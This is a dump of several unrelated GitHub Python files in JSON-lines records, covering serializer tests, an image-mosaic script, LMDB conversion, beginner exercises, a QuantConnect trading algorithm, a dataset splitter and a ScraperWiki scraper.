factories.EventValueFactory()\n event = event_value.event\n serialized_event = serializers.EventSerializer(event)\n self.assertEquals(serialized_event.data.get('alert'), event.alert.id)\n self.assertEquals(event_value.event.name, serialized_event.data.get('name'))\n\n def test_alert_serializer(self):\n alert = factories.AlertFactory()\n serialized_alert = serializers.AlertSerializer(alert)\n self.assertEquals(serialized_alert.data.get('contract'), alert.contract)\n self.assertIsNotNone(serialized_alert.data.get('dapp').get('authentication_code'))\n self.assertEquals(serialized_alert.data.get('dapp').get('authentication_code'), alert.dapp.authentication_code)\n\n alert_dict = {\n 'dapp': {\n 'name': 'Multisig',\n 'authentication_code': 'testcode',\n 'user': {\n 'email': 'test@test.com'\n }\n },\n 'abi': alert.abi,\n 'contract': alert.contract\n }\n\n self.assertTrue(serializers.AlertSerializer(data=alert_dict).is_valid())\n alert_dict['contract'] = None\n self.assertFalse(serializers.AlertSerializer(data=alert_dict).is_valid())\n\n","repo_name":"Consensys/eth-alerts","sub_path":"alerts/events/tests/test_serializers.py","file_name":"test_serializers.py","file_ext":"py","file_size_in_byte":2790,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"16"} +{"seq_id":"16749161360","text":"import ImageDB\nfrom PIL import Image\nfrom PIL import ImageEnhance\nimport io\nfrom image_crawler import store_raw_images\nimport base64\nimport time\n\nSCALE= 20\nMAX_SIZE = 20 \n\nstart_time = time.time()\n\n#src_img_path = './tea.jpg'\nsrc_img_path = input(\"Please enter the path to the src img\\n\")\nsrc = src_img_path.rsplit('/',1)[1]\nsrc = src.split('.')[0]\nprint('src is ' + str(src))\n\ndb = ImageDB.db()\ndb.init()\n\n#print(\"The testing crawling may take 20s...\")\n#store_raw_images(\"sky\")\nprint(\"Skipping crawl testing...\")\n\nim = Image.open(src_img_path).convert('LA')\n\n#im.show()\nwidth, height, = im.size\nprint('Original img width ' + str(width) + ' and height ' + str(height))\n\nif(width > MAX_SIZE):\n resize = width//MAX_SIZE\n width=MAX_SIZE\n height=height//resize\nelif (height > MAX_SIZE):\n resize = height//MAX_SIZE\n height = MAX_SIZE\n width = width//resize\n\n\nimm = im.thumbnail((width, height))\npx = im.load() #px is 2d matrix of pixel coordinates\nwidth, height, = im.size\nprint('Resized original img width ' + str(width) + ' and height ' + str(height))\n\ncanvas_width =int(width*SCALE)\ncanvas_height = 
int(height*SCALE)\nprint('Using scale of 1:20 pixels...')\nprint('Creating new canvas with width ' \n + str(canvas_width) + ' and height ' + str(canvas_height))\n\ncanvas = Image.new('RGB', (canvas_width,canvas_height), (0, 0, 255))\n#canvas.show()\n#print(\"file type \" + str(type(im)))\n\nnum_tiles_needed = width * height\n\nprint(\"Opening \"+ str(num_tiles_needed) + \" testing images...\")\ntiles_selected = db.select_num(num_tiles_needed)\n\ntry:\n for i in range(0, width):\n canvas_x = i*SCALE\n for j in range(0, height):\n canvas_y = j*SCALE \n \n print('px[' +str(i) +',' +str(j)+ ']'+ ' is ' + str(px[i,j]))\n px_l = px[i,j][0]\n px_a = px[i,j][1]\n \n print(\"Selecting pic close to \" + str(px[i,j]))\n \n identifier = j%74\n if identifier == 0:\n identifier = 75\n\n print(str(identifier))\n db.cursor.execute(\"SELECT img FROM imagedb.image WHERE id=%s;\", (identifier,))\n\n img = db.cursor.fetchone()\n img = db.raw_to_img(img[0])\n \n img.thumbnail((SCALE,SCALE))\n greyimg = img.convert('LA')\n #print(str(type(img))) #giving back nontype\n \n \n #brightness lvl here\n \n #factor = (260 - px_l)/200\n factor = px_l/255\n print(str(factor))\n enhancer_object = ImageEnhance.Brightness(greyimg)\n outimg = enhancer_object.enhance(factor) \n\n #pasting here\n canvas.paste(outimg, (canvas_x, canvas_y))\n\nexcept KeyboardInterrupt:\n print('\\nStopping, saving partial image...')\n\nfinally:\n canvas.save('./mosaic_' + str(src) +'.jpg')\n total_time = start_time - time.time()\n #mins = int(total_time//60)\n #seconds = total_time - 60*mins\n #print('\\nTime elapsed: ' + str(mins) +'mins ' + str(seconds) + 's \\n')\n print('\\nTime elapsed: ' + str(total_time)+ 's\\n')\n print('Original image size: ' +str(width) + ' by '+ str(height)+ '\\n')\n print('Collage image size: ' +str(canvas_width) + ' by ' +str(canvas_height) + '\\n')\n canvas.show()","repo_name":"CS3103-proj-mosaicit/MosaicIT","sub_path":"mysql/collaging.py","file_name":"collaging.py","file_ext":"py","file_size_in_byte":3261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"4813211623","text":"import os\nimport os.path as osp\n\nimport cv2\nimport torch\nfrom PIL import Image\nimport six\nimport lmdb\nimport pickle\nimport numpy as np\n\nimport torch.utils.data as data\nfrom torch.utils.data import DataLoader, Dataset\nfrom torchvision.datasets import ImageFolder\n\nimport data_manager\n\nimport os\nfrom PIL import Image\nimport numpy as np\nimport functools\nimport random\n\n\ndef read_image(img_path):\n\t\"\"\"Keep reading image until succeed.\n\tThis can avoid IOError incurred by heavy IO process.\"\"\"\n\tgot_img = False\n\twhile not got_img:\n\t\ttry:\n\t\t\timg = Image.open(img_path).convert('RGB')\n\t\t\tgot_img = True\n\t\texcept IOError:\n\t\t\tprint(\"IOError incurred when reading '{}'. Will redo. Don't worry. 
Just chill.\".format(img_path))\n\t\t\tpass\n\treturn img\n\n\ndef video_loader(img_paths):\n\tvideo = []\n\tfor image_path in img_paths:\n\t\twith open(image_path, 'rb') as f:\n\t\t\tvalue = f.read()\n\t\tvideo.append(value)\n\treturn video\n\n\ndef produce_out(imgs_path, seq_len, stride):\n\timg_len = len(imgs_path)\n\tframe_indices = list(range(img_len))\n\trand_end = max(0, img_len - seq_len * stride - 1)\n\tbegin_index = random.randint(0, rand_end)\n\tend_index = min(begin_index + seq_len * stride, img_len)\n\tindices = frame_indices[begin_index:end_index]\n\tre_indices = []\n\tfor i in range(0, seq_len * stride, stride):\n\t\tadd_arg = random.randint(0, stride - 1)\n\t\tre_indices.append(indices[i + add_arg])\n\tre_indices = np.array(re_indices)\n\n\tout = []\n\tfor index in re_indices:\n\t\tout.append(imgs_path[int(index)])\n\treturn out\n\n\ndef loads_data(buf):\n\t\"\"\"\n\tArgs:\n\t\tbuf: the output of `dumps`.\n\t\"\"\"\n\treturn pickle.loads(buf)\n\n\nclass DatasetLMDB(Dataset):\n\tdef __init__(self, db_path, transform=None):\n\t\tself.db_path = db_path\n\t\tself.env = lmdb.open(db_path,\n\t\t subdir=os.path.isdir(db_path),\n\t\t readonly=True, lock=False,\n\t\t readahead=False, meminit=False)\n\t\twith self.env.begin() as txn:\n\t\t\tself.length = pickle.loads(txn.get(b'__len__'))\n\t\t\tself.keys = pickle.loads(txn.get(b'__keys__'))\n\t\tself.transform = transform\n\n\tdef __getitem__(self, index):\n\t\twith self.env.begin() as txn:\n\t\t\tbyteflow = txn.get(self.keys[index])\n\n\t\tIMAGE = pickle.loads(byteflow)\n\t\timgs, label, cid = IMAGE[0], IMAGE[1], IMAGE[2]\n\n\t\treturn imgs, label, cid\n\n\tdef __len__(self):\n\t\treturn self.length\n\n\ndef raw_reader(path):\n\twith open(path, 'rb') as f:\n\t\tbin_data = f.read()\n\treturn bin_data\n\n\ndef dumps_data(obj):\n\t\"\"\"\n\tSerialize an object.\n\tReturns:\n\t\tImplementation-dependent bytes-like object\n\t\"\"\"\n\treturn pickle.dumps(obj)\n\n\ndef folder2lmdb(dataset, dpath, name=\"train\", write_frequency=4000):\n\tdirectory = osp.expanduser(osp.join(dpath, name))\n\tprint(\"Loading dataset from %s\" % directory)\n\t# dataset = ImageFolder(directory, loader=raw_reader)\n\t# data_loader = DataLoader(dataset, num_workers=16, collate_fn=lambda x: x)\n\tdata_loader = dataset\n\n\tlmdb_path = osp.join(dpath, \"%s.lmdb\" % name)\n\tisdir = os.path.isdir(lmdb_path)\n\n\tprint(\"Generate LMDB to %s\" % lmdb_path)\n\tdb = lmdb.open(lmdb_path, subdir=isdir,\n\t map_size=int(1099511627776), readonly=False,\n\t meminit=False, map_async=True)\n\n\ttxn = db.begin(write=True)\n\tfor idx, data in enumerate(data_loader):\n\t\timage_paths, label, cid = data[0], data[1], data[2]\n\t\timgs = video_loader(image_paths)\n\n\t\ttxn.put(u'{}'.format(idx).encode('ascii'), dumps_data((imgs, label, cid)))\n\t\tdel imgs\n\t\tif idx % write_frequency == 0:\n\t\t\tprint(\"[%d/%d]\" % (idx, len(data_loader)))\n\t\t\ttxn.commit()\n\t\t\ttxn = db.begin(write=True)\n\n\t# finish iterating through dataset\n\ttxn.commit()\n\tkeys = [u'{}'.format(k).encode('ascii') for k in range(idx + 1)]\n\twith db.begin(write=True) as txn:\n\t\ttxn.put(b'__keys__', dumps_data(keys))\n\t\ttxn.put(b'__len__', dumps_data(len(keys)))\n\n\tprint(\"Flushing database ...\")\n\tdb.sync()\n\tdb.close()\n\n\nif __name__ == \"__main__\":\n\t# generate lmdb\n\tfolder2lmdb(\"/home/snowtiger/LXH/Data/Mars\", 
name=\"bbox_train\")\n","repo_name":"flysnowtiger/DCCT","sub_path":"Data2LMDB.py","file_name":"Data2LMDB.py","file_ext":"py","file_size_in_byte":3889,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"5627092643","text":"#Write some code that delivers the following features in a clean, clear, and reusable way.\r\n\r\n#Determines whether a given number is prime (whose only factors are 1 and the number itself). The approach you take should not use any library functions that provide pre-built prime related maths functions.\r\n#If the number is not prime, capture the factors in some appropriate data structure, and output them.\r\n#If the number is prime - output the string ‘Prime!’.\r\n\r\n#Hint: one way of determining if a number is prime, is to first calculate the factors of a number, and then to look at the number of factors found. To determine if a number is a factor of another, use the modulus operator (%) that gives the remainder of a division operation - a remainder of 0 means that the number is a factor. \r\n\r\n#In other words, 10 % 3 == 1 ( 3 goes into 10, thrice times (3 + 3 + 3 == 9), with a remainder of 1 (10 - 1) ). 3 is not a factor of 10.\r\n#10 % 5 == 0 (5 goes into 10 twice (5 + 5), with no remainder - 5 is a factor of 10!\t\r\n\r\n\r\n#Extension:\r\n\r\n#If you have time, extend your application to calculate all the prime numbers in a given range.\r\n#In other words, given a min of 10 and a max of 20, your code should return a structure representing 11, 13, 17, 19.\r\n\r\n\r\n#Part B\r\n\r\n#Create a user interface - console based or GUI - that presents the data modeled above. If implementing a graphical user interface (such as a mobile app, web application or desktop GUI), you may want to consider an appropriate layout that presents the data in a sensible way. Your solution should include any relevant source files - such as layout XML files, HTML or CSS.\r\n\r\n#Your application will need to store the data in memory. However, If you choose to use a database to write the data out to permanent storage, remember to include any files necessary to initialise the database (migrations / seeders etc).\r\n\r\n#The interface should enable a user to enter a number, and specify the bounds of the range that will be considered for prime-ness. The interface should output results of the requested operation.\r\n\r\n\r\n\r\ndef prime_or_not(user_input):\r\n\r\n start = 2\r\n\r\n # to check for change in status of prime or not.\r\n signal = 0\r\n\r\n # 2 is the only number which is even and prime. 
\r\n if(user_input == 2):\r\n print('Prime!')\r\n\r\n # if the number isnt 2, we use the code below to check for prime-ness\r\n while(start < int(user_input)):\r\n\r\n if(int(user_input)%start == 0):\r\n\r\n \r\n signal+=1\r\n break\r\n \r\n else:\r\n \r\n start +=1\r\n\r\n\r\n if(signal == 0):\r\n\r\n print('Prime!')\r\n \r\n\r\n else:\r\n \r\n print('Not Prime')\r\n new_list=[]\r\n start=1\r\n\r\n while(start < int(user_input)):\r\n\r\n if(int(user_input)%start == 0):\r\n\r\n new_list.append(start)\r\n start+=1\r\n else:\r\n continue\r\n\r\n print(new_list)\r\n \r\n\r\n\r\n\r\n#def storing_factors(your_number):\r\n\r\n \r\n \r\n\r\n# Asking user for the input\r\n\r\ninput_number = input('Enter a number of your choice.')\r\n\r\n\r\nprime_or_not(input_number)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n \r\n \r\n \r\n\r\n","repo_name":"amalprojects/Coding-projects","sub_path":"assessment.py","file_name":"assessment.py","file_ext":"py","file_size_in_byte":3195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"29104759065","text":"# pylint: disable=missing-docstring\n\nfrom pytest import mark\n\nfrom gitflow_easyrelease import is_semver\n\n\n@mark.parametrize(\n \"version,expected\",\n [\n ('v0.0.0', True),\n ('0.0.0', True),\n ('v1.2.3', True),\n ('1.2.3', True),\n ('vX.Y.Z', False),\n ('X.Y.Z', False),\n ('vqqq', False),\n ('qqq', False),\n ]\n)\ndef test_is_semver(version, expected):\n assert expected == is_semver(version)\n","repo_name":"wizardsoftheweb/gitflow-easyrelease","sub_path":"tests/test_is_semver.py","file_name":"test_is_semver.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"71742432329","text":"from bisect import bisect_left, bisect_right\nimport sys\ninput = sys.stdin.readline\n\nn, x = map(int, input().split())\n\nnumbers = list(map(int, input().split()))\n\nleft = bisect_left(numbers, x)\nright = bisect_right(numbers, x)\n\nanswer = right-left\nif answer == 0:\n print(-1)\nelse:\n print(answer)\n\n# 7 2\n# 1 1 2 2 2 2 3\n\n# 7 4\n# 1 1 2 2 2 2 3","repo_name":"rbgksqkr/TIL","sub_path":"이코테/5. 
이진탐색/Q27_정렬된배열에서특정수의개수구하기.py","file_name":"Q27_정렬된배열에서특정수의개수구하기.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"2972173026","text":"def notas(* n, sit=False):\n \"\"\"\n\n -> Função para analisar notas e situações de vários alunos.\n :param n: uma ou mais notos dos alunos (aceita várias)\n :param sit: valor opcional, indicando se deve ou não adicionar a situação\n :return: dicionário com varias informações sobre a situação da turma\n \"\"\"\n cont = maior = menor = soma = 0\n\n for c in n:\n if cont == 0:\n maior = menor = c\n else:\n if c > maior:\n maior = c\n\n if c < menor:\n menor = c\n cont += 1\n soma += c\n media = soma / len(n)\n if sit:\n if media < 5:\n ficha = {'total': len(n), 'maior': maior, 'menor': menor, 'media': media, 'situacao': 'RUIM'}\n return ficha\n\n elif 5 <= media < 7:\n ficha = {'total': len(n), 'maior': maior, 'menor': menor, 'media': media, 'situacao': 'RAZOAVEL'}\n return ficha\n\n else:\n ficha = {'total': len(n), 'maior': maior, 'menor': menor, 'media': media, 'situacao': 'BOA'}\n return ficha\n\n else:\n ficha = {'total': len(n), 'maior': maior, 'menor': menor, 'media': media}\n return ficha\n\n\nresp = notas(3.5, 2, 6.5, 2, 7, 4, sit=True)\nprint(resp)\n","repo_name":"Wedson-Mateus/python-curso-em-video","sub_path":"Exércicios/ex105.py","file_name":"ex105.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"1425646297","text":"from django.http import HttpResponse\nfrom django.shortcuts import render\n\ndef index(request):\n return render(request, 'index.html')\n # return HttpResponse(\"Hello\")\n\ndef analyse(request):\n djtext = request.POST.get('text', 'default')\n removepunc = request.POST.get('removepunc', 'off')\n allcap = request.POST.get('allcap', 'off')\n nextlineremover = request.POST.get('nextlineremover', 'off')\n extraspaceremover = request.POST.get('extraspaceremover', 'off')\n\n if removepunc == 'on':\n analysed = ''\n punctuations = '''!()-[]{};:'\"\\,<>./?@#$%^&*_~'''\n\n for char in djtext:\n if char not in punctuations:\n analysed += char\n\n params = {\"purpose\": \"Remove Punctuations\", \"analyse_text\": analysed}\n djtext = analysed\n\n if allcap == 'on':\n analysed = ''\n for char in djtext:\n analysed += char.upper()\n\n params = {\"purpose\": \"Capitalise all Text\", \"analyse_text\": analysed}\n djtext = analysed\n\n if nextlineremover == 'on':\n analysed = ''\n for char in djtext:\n if char != \"\\n\" and char != \"\\r\":\n analysed += char\n\n params = {\"purpose\": \"Remove next Lines\", \"analyse_text\": analysed}\n djtext = analysed\n\n if extraspaceremover == 'on':\n analysed = ''\n for index, char in enumerate(djtext):\n if djtext[index] == \" \" and djtext[index + 1] == \" \":\n pass\n else:\n analysed += char\n\n params = {\"purpose\": \"Remove Extra Space\", \"analyse_text\": analysed}\n\n return render(request, 'analyse.html', params)\n","repo_name":"amitgautam1994/TextAnalyse","sub_path":"pipeline/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"36670080095","text":"import logging\nimport os\nimport tensorflow as tf\nimport numpy as np\nimport time\ntf.enable_eager_execution()\nimport tensorflow_datasets as tfds\n\nfrom concurrent.futures import ProcessPoolExecutor\nfrom 
concurrent.futures import ThreadPoolExecutor\n\ndef run(path):\n time.sleep(10)\n with open(path, \"r\", encoding=\"utf-8\") as f:\n text = \"\"\n for i in f.readlines():\n text += i + \" \"\n\n text_set = set(text.lower().split(\" \"))\n return text_set\n\n\n\n\ndef token_test():\n string=\"Create a list of partitioned variables according to the given slicing.\"\n f=open(r\"C:\\data\\tmp2\\ADA046646.txt\",\"r\",encoding=\"utf-8\").read()\n tokenizer = tfds.features.text.Tokenizer()\n\n vocabulary_set = set()\n list=[]\n texts=[]\n for file in os.listdir(r\"C:\\data\\tmp2\"):\n f = open(r\"C:/data/tmp2/\"+file, \"r\", encoding=\"utf-8\").read()\n st=tokenizer.tokenize(f)\n vocabulary_set.update(st)\n list.append(st.__len__())\n # print(st)\n\n list=sorted(list)\n print(list[int(list.__len__()/2)],list)\n # print(vocabulary_set.__len__())\n # encoder = tfds.features.text.TokenTextEncoder(vocabulary_set)\n # list=encoder.encode(string)\n # print(type(list))\n # print(encoder.encode(st))\n # print(vocabulary_set)\n\n\ndef select_data():\n writer = open(r\"C:\\temp\\subject_file_1000.txt\", \"w+\", encoding=\"utf-8\")\n dir=r\"C:\\temp\\classification\"\n temp={}\n with open(r\"C:\\Users\\zhaozhijie.CNPIEC\\Desktop\\new_temp_subject_file.txt\",encoding=\"utf-8\") as f:\n for line in f.readlines():\n item=line.split(\"##\")\n if item[0] in temp.keys():\n temp[item[0]].append(line)\n else:\n temp[item[0]]=[line]\n for i in range(1000):\n for key in temp.keys():\n if len(temp[key])>1000:\n writer.write(temp[key][i])\n # writer1 = open(os.path.join(dir,key+\".txt\"), \"w+\", encoding=\"utf-8\")\n # for index,line in enumerate(temp[key]):\n # writer1.write(line)\n\n\n\n\n\nif __name__ == '__main__':\n # select_data()\n import pydot\n # token_test()\n # x = [[1, 2, 3],\n # [1, 2, 3]]\n #\n # xx = tf.cast(x, tf.float32)\n #\n # mean_all = tf.reduce_mean(xx, keep_dims=False)\n # mean_0 = tf.reduce_mean(xx, axis=0, keep_dims=False)\n # mean_1 = tf.reduce_mean(xx, axis=1, keep_dims=False)\n # print(mean_all,mean_0,mean_1)\n # Nonparallel code\n # data=[\n # r\"C:\\data\\text_classification\\result_subject\\DE200615017155.txt\",\n # r\"C:\\data\\text_classification\\result_subject\\N8625307.txt\",\n # r\"C:\\data\\text_classification\\result_subject\\N140011168.txt\",\n # r\"C:\\data\\text_classification\\result_subject\\DE200615017183.txt\",\n # r\"C:\\data\\text_classification\\result_subject\\N150009463.txt\"\n # ]\n # s=time.time()\n # results = map(run, data)\n #\n # for r in results:\n # print(r)\n # e = time.time()\n #\n # print(\"时间:\", e - s)\n #\n # s = time.time()\n # # Parallel implementation\n # with ProcessPoolExecutor() as pool:\n # # with ThreadPoolExecutor(128) as pool:\n #\n # results = pool.map(run, data)\n # for r in results:\n # print(r)\n #\n # e = time.time()\n #\n # print(\"时间:\", e - s)","repo_name":"hrl13260130208/TensorFlow_test","sub_path":"test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":3332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"15853135902","text":"# region imports\nfrom AlgorithmImports import *\n# endregion\n\nclass SmoothOrangeHyena(QCAlgorithm):\n\n def Initialize(self):\n self.SetStartDate(2010, 1, 1) # Set Start Date\n self.SetEndDate(2015,1,1)\n self.SetCash(100000) # Set Strategy Cash\n self.stock = self.AddEquity(\"SPY\",Resolution.Daily)\n\n self.Invest=True\n\n\n def OnData(self, data: Slice):\n if not self.Portfolio.Invested and self.Invest:\n 
self.MarketOrder(self.stock.Symbol,1000)\n self.Invest=False\n\n if self.Time == datetime(day=1,month=1,year=2014):\n self.MarketOrder(self.stock.Symbol, -1000)","repo_name":"rkaelle/algo-trading-strategies","sub_path":"MarketOrder.py","file_name":"MarketOrder.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"7595596981","text":"import numpy as np\nimport math\nimport os\nimport shutil\n\nclass train_test_val_split_class:\n def __init__(self, dataset_dir_name, txt_filename, ratio):\n \"\"\"\n INPUTS:\n ::string:: dataset_dir_name #FULL path of the original dataset\n ::string:: txt_filename #Base path (not full path) of the txt label file\n ::tuple of 3 floats:: ratio #tuple of 3 elements containing the train, val, test ratio\n \"\"\"\n self.dataset_dir_name = dataset_dir_name\n self.root = os.path.dirname(self.dataset_dir_name) #directory in which dataset_dir_name is in\n self.dataset_dir = os.path.join(self.root, dataset_dir_name) #directory of original dataset\n\n # self.splitted_dataset_dir = os.path.join(self.root, 'splitted_dataset') #directory of splitted dataset\n\n #OLD (2020):\n #self.splitted_dataset_dir = os.path.join(self.root, 'splitted_dataset_' + str(ratio[0]) + '_' + str(ratio[1]) + '_' + str(ratio[2])) #directory of splitted dataset\n #NEW (Jan. 31, 2021):\n self.splitted_dataset_dir = os.path.join(self.root, 'splitted_' + os.path.basename(dataset_dir_name) + '_' + str(ratio[0]) + '_' + str(ratio[1]) + '_' + str(ratio[2])) #directory of splitted dataset\n\n self.train_dir = os.path.join(self.splitted_dataset_dir, 'train')\n self.val_dir = os.path.join(self.splitted_dataset_dir, 'val')\n self.test_dir = os.path.join(self.splitted_dataset_dir, 'test')\n self.txt_filename = os.path.join(self.dataset_dir, txt_filename) #full filename of txt label file\n self.ratio = ratio #tuple of 3 elements containing: train, val, test ratio\n np.random.seed(1000)\n\n def get_split_houses(self, ratio):\n \"\"\"\n Returns 3 lists which are the house numbers for train, val, test\n INPUTS:\n ::tuple of size 3:: ratio #train, val, test\n OUTPUTS:\n ::list:: train_house_numbers #train\n ::list:: val_house_numbers #val\n ::list:: house_numbers #test\n \"\"\"\n num_images = 0 #total number of images\n for entry in os.scandir(self.dataset_dir):\n if entry.is_file() and (not entry.path.endswith(\".txt\")):\n num_images += 1\n num_houses = int(num_images / 4) #total number of houses\n print(num_houses)\n\n num_train = int(math.floor(num_houses * ratio[0])) #number of houses for training\n num_val = int(math.ceil(num_houses * ratio[1])) #number of houses for validation\n num_test = int(math.floor(num_houses * ratio[2])) #number of houses for test\n\n print(\"train, val, test:\", num_train, num_val, num_test, \"\\n\\n\")\n\n house_numbers = [i for i in range(1,num_houses+1,1)] #list of numbers from 1 to num_houses\n\n train_house_numbers = [] #house numbers for train\n for i in range(0,num_train,1): #randomly pick num_train houses for train\n pick_num = np.random.randint(0,len(house_numbers))\n pick = house_numbers[pick_num]\n train_house_numbers += [pick]\n house_numbers.remove(pick)\n\n val_house_numbers = [] #house numbers for val\n for i in range(0,num_val,1): #randomly pick num_val houses for val\n pick_num = np.random.randint(0,len(house_numbers))\n pick = house_numbers[pick_num]\n val_house_numbers += [pick]\n house_numbers.remove(pick)\n\n #Note: whatever house numbers that have not been 
picked will be for test\n '''\n print(train_house_numbers, \"\\n\")\n print(val_house_numbers, \"\\n\")\n print(house_numbers, \"\\n\")\n print(\"Total:\", len(train_house_numbers) + len(val_house_numbers) + len(house_numbers))\n '''\n return train_house_numbers, val_house_numbers, house_numbers #train, val, test\n\n def write_to_test(self, test_list, house_info_filename, result_filename):\n house_info = self.get_house_info_list(house_info_filename)\n f = open(result_filename, 'w')\n for house_num in test_list:\n target_house_info = house_info[house_num-1]\n f.write(target_house_info)\n f.close()\n return True\n\n def get_house_info_list(self, filename):\n #Reading in file\n f = open(filename, \"r\")\n housing_info_list = []\n for line in f:\n housing_info_list.append(line)\n f.close()\n return housing_info_list\n\n #get_house_info_list(txt_filename)\n def train_test_val_split(self, ratio, house_info_filename):\n if os.path.isdir(self.splitted_dataset_dir) == False:\n os.mkdir(self.splitted_dataset_dir)\n if os.path.isdir(self.train_dir) == False:\n os.mkdir(self.train_dir)\n if os.path.isdir(self.test_dir) == False:\n os.mkdir(self.test_dir)\n if os.path.isdir(self.val_dir) == False:\n os.mkdir(self.val_dir)\n\n train_house_numbers, val_house_numbers, test_house_numbers = self.get_split_houses(ratio)\n self.write_to_test(train_house_numbers, house_info_filename, os.path.join(self.train_dir, 'train_HousesInfo.txt'))\n self.write_to_test(val_house_numbers, house_info_filename, os.path.join(self.val_dir, 'val_HousesInfo.txt'))\n self.write_to_test(test_house_numbers, house_info_filename, os.path.join(self.test_dir, 'test_HousesInfo.txt'))\n\n for entry in os.scandir(self.dataset_dir):\n if entry.is_file() and (not entry.path.endswith(\".txt\")):\n entry_string = os.path.basename(entry) #just the filename, not the full path\n splitted = entry_string.split(\"_\")\n if splitted[0]=='.DS':\n continue\n else:\n filenum = int(splitted[0]) #file number of current file\n\n if filenum in train_house_numbers:\n shutil.copy(entry.path,self.train_dir) #copy image to train_dir\n elif filenum in val_house_numbers:\n shutil.copy(entry.path,self.val_dir) #copy image to val_dir\n elif filenum in test_house_numbers:\n shutil.copy(entry.path,self.test_dir) #copy image to test_dir\n\n return True\n\n def do_split(self):\n self.train_test_val_split(self.ratio, self.txt_filename)\n return True\n\n#if you only want to do the split and no augmentation, uncomment below:\n'''\ndataset_full_path = 'C:/Users/Matthew/Desktop/UTMIST/raw_dataset' #change the path accordingly\ntrain_val_test_ratio = (0.70,0.10,0.20)\ntxt_filename_raw = 'HousesInfo.txt'\nobj = train_test_val_split_class(dataset_full_path, txt_filename_raw, train_val_test_ratio)\nobj.do_split()\n'''\n","repo_name":"UTMIST/RealValue","sub_path":"train_test_val_split_class.py","file_name":"train_test_val_split_class.py","file_ext":"py","file_size_in_byte":6745,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"16"} +{"seq_id":"3907047559","text":"import json\nimport urllib\n\nfrom ebdata.retrieval.scrapers import newsitem_list_detail\n\n\nclass ScraperWikiScraper(newsitem_list_detail.NewsItemListDetailScraper):\n \"\"\"OpenBlock scraper class to extract data from ScraperWiki data sources\"\"\"\n\n url = \"http://api.scraperwiki.com/api/1.0/datastore/sqlite\"\n list_filter = None\n ordering = None\n limit = 50\n\n def get_query(self, select='*', limit=10, offset=0):\n where = ''\n if self.list_filter:\n parts = []\n 
for key, val in self.list_filter.iteritems():\n parts.append(\"{0} = '{1}'\".format(key, val))\n where = ' AND '.join(parts)\n query = ['SELECT {0} FROM `swdata`'.format(select)]\n if where:\n query.append('WHERE {0}'.format(where))\n if self.ordering:\n query.append('ORDER BY {0}'.format(self.ordering))\n if limit > 0:\n query.append('LIMIT {0}'.format(limit))\n if offset > 0:\n query.append('OFFSET {0}'.format(offset))\n query = ' '.join(query)\n self.logger.debug(query)\n return query\n\n def get_url(self, query):\n args = {'name': self.scraper_name, \"format\": \"jsondict\",\n \"query\": query}\n url = \"{0}?{1}\".format(self.url, urllib.urlencode(args))\n self.logger.info(url)\n return self.get_html(url)\n\n def count(self):\n query = self.get_query(select='COUNT(*) AS count', limit=0, offset=0)\n data = json.loads(self.get_url(query=query))[0]\n return data['count']\n\n def list_pages(self):\n count = self.count()\n offset = 0\n while offset < count:\n yield self.get_url(query=self.get_query(limit=self.limit,\n offset=offset))\n offset += self.limit\n\n def parse_list(self, data):\n for row in json.loads(data):\n self.stats['Downloaded'] += 1\n self.logger_extra['Row'] = \"%s-%s\" % (self.logger_extra['Run'],\n self.stats['Downloaded'])\n self.geocode_log = None\n yield row\n","repo_name":"OpenData-NC/columbus-county-nc","sub_path":"openrural/retrieval/base/scraperwiki.py","file_name":"scraperwiki.py","file_ext":"py","file_size_in_byte":2149,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"16"} +{"seq_id":"43012941391","text":"import random\nimport matplotlib.pyplot as plt\nimport networkx as nx\n# import pygraphviz as pgv\nfrom networkx.drawing.nx_agraph import to_agraph\nimport my_networkx as my_nx\nfrom anytree import Node, RenderTree\n\n\nclass translator:\n Rules = {}\n VN, VT = [], []\n target_symbol = 's'\n endings = []\n EPS = chr(1)\n\n def Read(self, filename):\n f = open(filename)\n lines = f.readlines()\n index1 = lines[0].find('{')\n index2 = lines[0].find('}')\n self.VT = lines[0][index1 + 1: index2].split(',')\n line = lines[0][index2 + 1:]\n index1 = line.find('{')\n index2 = line.find('}')\n self.VN = line[index1 + 1: index2].split(',')\n self.target_symbol = line[len(line) - 3]\n print('VT :', self.VT)\n print('VN :', self.VN)\n print('Целевой символ :', self.target_symbol)\n for i in range(2, len(lines)):\n lines[i] = lines[i].strip('\\n')\n if lines[i] == \"P:\":\n continue\n term = lines[i][:lines[i].find('-')]\n if '|' in lines[i]:\n self.Rules[term] = lines[i][lines[i].find('-->') + 3:].split('|')\n if lines[i].endswith('|'):\n self.Rules[term].append(self.EPS)\n else:\n self.Rules[term] = lines[i][lines[i].find('-->') + 3]\n try:\n self.endings.extend(self.Rules[term])\n except:\n print(\"Ошибка\")\n res = '|'.join(value for value in self.Rules[term])\n print(term, '-->', res)\n\n def Write(self):\n index, length = 0, 0\n iterations = 0\n replacement = ''\n output = self.target_symbol\n print(output, end='')\n while (index < len(output)):\n if iterations > 30:\n break\n if output[index] in self.VT:\n replacement = 